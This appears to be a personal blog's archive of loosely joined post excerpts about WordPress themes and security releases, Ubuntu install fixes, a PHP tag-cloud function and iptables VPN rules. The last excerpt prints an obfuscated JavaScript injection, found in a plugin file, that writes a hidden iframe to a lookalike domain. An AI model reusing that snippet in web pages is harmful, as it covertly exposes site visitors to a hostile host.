I managed to take quite a few photos around Ames and Nevada, you can find them in this set on Flickr. There are currently four panoramas that do a pretty good job of showing how much water there was on the East side of Ames.

The Ames Tribune has a PDF with some really cool aerial shots, it’s worth checking out.

blog-directory.php is a custom page template for Twenty Ten. If you’re using the Twenty Ten theme, you can just drop blog-directory.php into the “twentyten” theme folder and be done. If you’re using another theme you’ll need to open blog-directory.php and copy everything between <!– start blog directory –> and <!– end blog directory –> and paste it into a custom template for your theme.

If you’re not familiar with custom page templates in WordPress, you can read about them here.

Download blog-directory.zip

I backed up all of my important files and some configuration files to a second drive, /dev/sdb. My previous Ubuntu install was installed on /dev/sda1 and I used the sdb drive for photos and videos.

When the installation got to the point of configuring partitions, I was a little bummed to see that my first drive, /dev/sda, wasn’t included in the list of drives and partitions. This machine needed a fresh install badly, so I posted on the Ubuntu Forums to see if anyone knew of a fix.

After a few days of no replies, gregmo posted and offered a solution. He suggested running the command below while running the live cd, prior to installing. This removes dmraid from the system running off the live cd.

sudo apt-get remove dmraid

After removing the dmraid package, I fired up the installer and was able to install to /dev/sda1 just fine. For some reason, removing the dmraid package allowed the partition manager to see /dev/sda.

Blackbird Pie is a tool provided by the Twitter Media team that allows you to embed tweets directly in your blog posts or any website really. Here’s a good description of Blackbird Pie from a post at media.twitter.com:

The origin of the script is both self- and user-centered. Mostly, we just think it’s a pain to take screen grabs of tweets. But of course we also think it’s a much better user experience to have @-mentions, hashtags and the account itself all linked and clickable.

The tweet above is an example of what Blackbird Pie does, definately much better than having to take a screenshot and post the tweet that way. All you have to do is provide the URL to the tweet and Blackbird Pie will spit out code for you to post in your blog or website. Now you can actually link directly to the tweet and the tweets author, and have the tweets content visible to search engines, something not possible with screenshots alone. Hashtags and @ mentions are also linked.

It’s a neat tool, sure to be of use to folks who like to embed tweets in their site. Blackbird Pie is a way better option for embedding tweets compared to simply taking screenshots of tweets.

Download The Code

The function returns an array that contains each category name, the CSS class that should be applied to the given category, and the category ID for linking to the page showing only questions in that category.

<?php
function tagCloud($maximum=0) {
	$cats = array(); // create empty array

	$query = mysql_query("SELECT categories.catDesc, categories.catId, COUNT( questions.id ) AS totalQuestions FROM questions, categories WHERE questions.categoryId = categories.catId GROUP BY categories.catId;");
	while ($row = mysql_fetch_array($query)) {
		$cat = $row['catDesc'];
		$counter = $row['totalQuestions'];
		$catid = $row['catID'];

		// update $maximum if this term is more popular than the previous terms
		if ($counter> $maximum) $maximum = $counter;

		$percent = floor(($counter / $maximum) * 100);
		if ($percent <20) {
			$class = 'smallest';
		}
		elseif ($percent>= 20 and $percent <40) {
			$class = 'small';
		}
		elseif ($percent>= 40 and $percent <60) {
			$class = 'medium';
		}
		elseif ($percent>= 60 and $percent <80) {
			$class = 'large';
		}
		else {
			$class = 'largest';
		}
		$cats[] = array('term' => $cat, 'class' => $class, 'catid' => $catid);

	}
	return $cats;
}
?>

You’ll also need some CSS to style your tag cloud. This CSS is pretty much identical to what Steve published, I only made some minor changes to font sizes.

#tagcloud {
    width: 300px;
    background:#FFFFCC;
    color:#0066FF;
    padding: 10px;
    border: 1px solid #FFE7B6;
    text-align:center;
}

#tagcloud a:link, #tagcloud a:visited {
    text-decoration:none;
}

#tagcloud a:hover, #tagcloud a:active {
    text-decoration: underline;
    color: #000;
}

#tagcloud span {
    padding: 4px;
}

.smallest {
    font-size: 10px;
}

.small {
    font-size: 12px;
}

.medium {
    font-size:14px;
}

.large {
    font-size:16px;
}

.largest {
    font-size:18px;
}

To use the function, do something like this:

<div id="tagcloud">
<?php
$tagCloud = tagCloud();
foreach ($tagCloud as $t) {
	$cat = $t['term'];
	$class = $t['class'];
	$catid = $t['catid'];
	print "<a href=\"category.php?id=$catid\">$cat</a>";
}
?>
</div>

I am still testing this code, but so far it seems to do exactly what I need it to do. If you experience trouble with the code or if it doesn’t act as expected, please let me know in the comments. If you’ve got ideas on how to improve the function, I’d love to hear your thoughts as well!

Thomas Mackenzie alerted us to a problem where logged in users can peek at trashed posts belonging to other authors. If you have untrusted users signed up on your blog and sensitive posts in the trash, you should upgrade to 2.9.2. As always, you can visit the Tools->Upgrade menu to upgrade.

Thomas Mackenzie goes into much greater detail about the problem on his site. Check his site out for more info on why the 2.9.2 release was necessary.

It’s worth mentioning that the last remnants of the old SideBar Manager, or SBM, have now been removed from the codebase. It started out as a fully-fledged replacement for WP’s lacking widgets system and ended up as a patch-of-sorts to the widget system, allowing for widgets to be placed only on specified pages. But in the end, while the native widget system is still very much in need of an update, it didn’t feel right for K2 to try and cover that particular area of the administration interface. And besides, other plugins for doing just that exist already.

So instead of spending our time patching that system for an ever-changing WordPress, our time is probably better spent on more theme-specific functionality, like the rolling archives or livesearch systems, as well as keeping up with new WordPress features, like for instance Post Thumbnails.

Rather than break down all of what’s changed in recent versions of K2, I’m going to make it easy on myself and direct you to the K2 1.0 release announcement. Just know that Unwakeable 1.5.3 sports all the features found in K2 1.0.3. You can comment on this post or on the Unwakeable page with questions or comments.

This release addresses a handful of minor issues as well as a rather annoying problem where scheduled posts and pingbacks are not processed correctly due to incompatibilities with some hosts. If any of these issues affect you, give 2.9.1 a try. Download 2.9.1 or upgrade automatically from the Tools->Upgrade menu in your blog’s admin area.

WordPress 2.9.1 came less than a month after WordPress 2.9.

2.8.6 fixes two security problems that can be exploited by registered, logged in users who have posting privileges. If you have untrusted authors on your blog, upgrading to 2.8.6 is recommended.

The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.

You can download WordPress 2.8.6 here.

I wanted to make a note of how to allow VPN connections in the event that the Firestarter website becomes inaccessible again, that’s basically the point of this post. The page on the Firestarter site that details VPN connections can be found here. This should apply to pretty much every Linux distribution, not just Ubuntu.

To allow VPN connections with the Microsoft VPN client, simply enter the following lines into /etc/firestarter/user-pre.

# Forward PPTP VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

And to allow VPN connections with the Cisco VPN client, enter the following lines into /etc/firestarter/user-pre.

# Forward Cisco VPN client traffic
$IPT -A FORWARD -i $IF -o $INIF -p udp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 500 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $IF -o $INIF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -i $INIF -o $IF -p 50 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

Finally, if you’re running a Microsoft VPN server and want to allow incoming PPTP VPN connections, add the following lines to /etc/firestarter/user-pre.

# Forward PPTP VPN connections to internal server
SERVER=192.168.0.100 # Internal VPN server

$IPT -A FORWARD -i $IF -o $INIF -p tcp --dport 1723 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p tcp --dport 1723 -j DNAT --to $SERVER
$IPT -A FORWARD -i $IF -o $INIF -p 47 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
$IPT -t nat -A PREROUTING -i $IF -p 47 -j DNAT --to $SERVER 

That should pretty much cover it. If you are using OpenVPN, head over to the Firestarter VPN configuration page for details.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The headline changes in this release are:

• A fix for the Trackback Denial-of-Service attack that is currently being seen.
• Removal of areas within the code where php code in variables was evaluated.
• Switched the file upload functionality to be whitelisted for all users including Admins.
• Retiring of the two importers of Tag data from old plugins.

You can download WordPress 2.8.5 here.

<?php if ( get_post_custom_values('comments') ): ?>

2. Comment out that if statement, so it should look like this when you’re done:

<?php //if ( get_post_custom_values('comments') ): ?>

3. You’re halfway done at this point. Now go to line 40, which should look like this:

<?php endif; ?>

4. Comment out this piece of code as well, so modify line 40 so it looks like the code below.

<?php //endif; ?>

5. Save the page.php file and you should be all set.

I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

The SANS Internet Storm Center had a nice post about this earlier today that details why WordPress 2.8.4 was necessary.

function advQuery(){
	var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
	document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
	document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();

I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.